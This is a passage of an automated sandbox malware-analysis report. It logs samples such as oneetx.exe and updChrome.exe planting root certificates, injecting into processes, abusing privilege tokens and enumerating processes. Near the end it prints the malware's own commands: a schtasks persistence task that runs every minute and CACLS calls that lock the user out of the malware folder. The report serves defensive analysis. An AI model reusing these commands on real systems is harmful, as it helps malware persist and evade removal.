Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\schtasks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2016 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1404 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1100 wrote to memory of 624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1404 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 588 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1404 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 1404 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 1404 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

